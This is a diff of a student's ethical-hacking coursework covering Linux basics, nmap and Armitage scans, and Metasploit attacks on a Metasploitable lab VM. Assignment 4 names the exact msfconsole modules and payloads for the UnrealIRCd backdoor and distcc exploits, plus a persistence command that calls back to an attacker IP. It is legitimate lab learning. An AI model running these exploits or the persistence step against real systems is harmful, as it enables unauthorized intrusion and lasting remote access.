Pretty much all of Fall 2024

7th-Semester-Fall-2024/Ethical-Hacking/assignments/assignment-2/assignment-2.md

@@ -0,0 +1,49 @@
+# Ethical Hacking in ECE Assignment 2 - Aidan Sharpe
+
+## Assignment Tasks
+### Task 1
+Create a directory named `ethics_lab` and manage files within it using commands like `mkdir`, `cd`, `mv`, and `touch`.
+
+![](file_management.png)
+Create a directory called `ethics_lab` using the `mkdir` command. Then navigate to `ethics_lab` using `cd`. Create three files (`file1`, `file2`, and `file3`) using the `touch` command. Show the contents of the `ethics_lab` directory using `ls`. Write the text "hello" into `file3` using echo and the write to file symbol (`>`). Print the contents of `file3` to the terminal using the `cat` command.
+### Task 2
+Monitor and manage processes on your system using tools like `ps`, `top`, and `kill`. Identify and terminate a process.
+
+![](top.png)
+
+View an active, sorted list of all tasks running on the system using `top`.
+
+![](task_tools.png)
+
+List all tasks running on the system using `ps -e` then pass the output into `grep` and filter for the text "fox". This shows the information for the firefox-esr task. The number at the beginning of the line is the process identifier, and the process can be ended by executing `kill` followed by that process ID.
+
+### Task 3
+Use `ifconfig`/`ip a`, `ping`, and `netstat`.
+
+![](network.png)
+
+Running `ip a` shows IP address information. For example, we can see that the current IP address is `192.168.56.101`. We also ran this command on another virtual machine and found that its IP address was `192.168.56.102`, so we can ping it using `ping` to see if a connection can be established. Running`netstat` shows a list of network connections.
+
+### Task 4
+Set up a second VM and connect to it using `ssh`.
+
+![](ssh.png)
+
+Prior to running the command, a host configuration was created called `msf`. This contained the known ip address and the preferred key algorithm. The command `ssh msfadmin@msf` creates a login tunnel for the user account `msfadmin` between the host and remote system. 
+
+### Task 5
+Configure the firewall using `ufw`. Enable the firewall and allow SSH traffic.
+
+![](firewall.png)
+
+## Reflection
+Learning basic Linux command is an important skill for ethical hacking for multiple reasons. 
+
+### Reason 1 - Most Ethical Hacking Tools Run on Linux
+Most ethical hacking tools run on or are designed specifically for Linux machines. Knowing how to better use the machines that your tools are running on is always advantageous.
+
+### Reason 2 - Most Servers Run Linux
+Since over 90% of the servers on the internet run Linux, that means that most databases (the places where pretty much all valuable information is stored) are hosted on Linux-based servers. By being familiar with basic Linux commands, navigating remote server file systems becomes a much easier task.
+
+### Skills Gained from This Assignment
+One skill I learned from this assignment is forcing a specific key algorithm for different hosts. While I have used SSH many times in the past, I was not aware that different machines restricted the type of keys used. Frankly, I thought they all used the same type of key. After completing this exercises, I am now practiced in the configuration of host key algorithms.

7th-Semester-Fall-2024/Ethical-Hacking/assignments/assignment-3/assignment-3.md

@@ -0,0 +1,36 @@
+# Ethical Hacking Assignment 3 - Aidan Sharpe
+
+## Task 1 - Network Configuration Between Kali and Metasploitable
+Ensure proper network connectivity between the attacker (Kali Linux) and victim (Metasploitable) virtual machines.
+
+1. Configure both Kali Linux and Metasploitable VMs to use host-only adapters
+
+![](kali-network.png)
+![](metasploitable-network.png)
+2. Verify the network connectivity by pinging Metasploitable from Kali Linux
+
+![](ping.png)
+
+## Task 2 - Nmap Scan for Open Ports and Vulnerabilities
+Use `nmap` to perform a vulnerability scan of the metasploitable machine.
+![](nmap.png)
+
+## Task 3 - Installing and Launching Armitage
+Install Armitage and set it up to connect with the Metasploit framework.
+
+![](armitage-running.png)
+
+## Task 4 - Perform a Vulnerability Scan with Armitage
+Use Armitage to scan the Metasploitable machine and identify potential vulnerabilities.
+
+![](armitage-scan.png)
+
+## Task 5 - Exploiting a Vulnerability Using Armitage
+Use Armitage to exploit a vulnerability on the Metasploitable machine and gain access.
+
+![](ftp-exploit.png)
+
+## Reflection
+The `nmap` tool is suprisingly easy, yet very powerful. After using it on this assignment, I used it to learn about vulnerabilities on my home server. I found that I had ports 80, 443, and 22 open. I did not realize that I had left it open, and I couldn't remembery why I had it open in the first place. I then used a remote network configuration tool to close port 80. After running `nmap` again, I saw that I had successfully closed the port. 
+
+I really enjoyed using Armitage as an easy introduction to the Metasploit Framework. At this point, I really only plan to use it as a learning tool to get used to deploying attacks and scanning networks. Today, for example, I learned about scanning IP ranges. My next step is to switch to the metasploit CLI.

7th-Semester-Fall-2024/Ethical-Hacking/assignments/assignment-4/assignment-4.md

@@ -0,0 +1,51 @@
+# Ethical Hacking Assignment 4 - Aidan Sharpe
+
+## Network Configuration
+To establish a connection between the two boxes, proper network configuration is required. The virtual machines (attacker and victim) were set to 'Host-Only Adapter' as seen below.
+
+![](attacker-network.png)
+
+Attacker Network Configuration
+
+![](victim-network.png)
+
+
+Victim Network Configuration
+
+To confirm a proper setup, the attacker pinged the victim and viewed its open ports using the `ping` and `nmap` commands on the victim's IP address (`192.168.56.104`).
+
+![](victim-ping-nmap.png)
+
+
+## Exploiting UnrealIRCd 3.2.8.1 Backdoor
+Now that a proper connection has been confirmed, we can begin exploiting the victim machine. First we started `msfconsole` as root. The exploit is chosen using `use exploit/unix/irc/unreal_ircd_3281_backdoor`. Then the remote and local host variables (RHOST and LHOST) are set to the victim and attacker IP addresses respectively. Next, a payload is chosen. In our case, we used the `cmd/unix/reverse` payload to establish a remote shell. After setting the local port (LPORT) to 4444, we began the exploit.
+
+![](irc-exploit-attempt.png)
+
+Unfortunately, while the exploit completed, no remote shell could be started. Looking into the options, no issues were found. Multiple payloads were tried, each yielding the same error message: "Exploit completed, but no session was created." That is until we deployed the payload, `cmd/unix/bind_perl`. Finally, we established a remote shell connection!
+
+![](irc-exploit-success.png)
+
+## Exploiting the DistCC Daemon
+The next exploit tested was the DistCC Daemon. Switching exploits in `msfconsole` is as easy as telling it to use the name of the new exploit. In our case, with the DistCC Daemon, we used `use exploit/unix/misc/distcc_exec`. The LHOST, RHOST, and LPORT were set to be the same as before. Finally, a payload was selected. The default was `cmd/unix/reverse`, so we tested that first. Unfortunately, we ran into the same error as before "Exploit completed, but no session was created." Again, using `cmd/unix/bind_perl` as the payload instead of `cmd/unix/reverse` fixed the issue, and we successfully opened a remote shell.
+
+![](distcc-daemon-sucess.png)
+
+## Post Exploitation Activities
+Now that a remote shell connection is established, we must gather information about and maintain our connection to the victim. We opted to learn about user and active process information.
+
+![](meterpreter-commands.png)
+
+While commands like `ps` and `uname -a` work in the remote shell, Meterpreter specific commands like `hashdump` and `migrate` did not work.
+
+## Persistence
+Persistence is used to easily reconnect to the victim, even after reboots. Running the command `run persistence -U -i 60 -p 4444 -r 192.166.56.101` theoretically enables this behavior. Unfortunately, the shell provided no feedback upon execution, and upon restarting Metasploitable, there were no sessions to attach to.
+
+![](no-active-session.png)
+
+## Reflection
+Hacking is finicky, I mean *super* finicky. Success with identical setups can vary, and slightly different environments can have drastically different results. Even following the setup to the tee can create non-functional results. 
+
+Fortunately, however, there are always a handful of potential solutions if one method does not work. For example, attempting to use the `cmd/unix/reverse` was unsuccessful, but that was just one of many potential payloads. Eventually, with enough trial and error, success may be found.
+
+Even though a successful attack was launched, the shell environment was different than expected. For example, the instructions put the attacker in a Meterpreter environment, but the successful attack put the user in a `cmd/unix` shell environment instead. While Meterpreter provides some really useful tools, the `cmd/unix` shell is much more bare bones.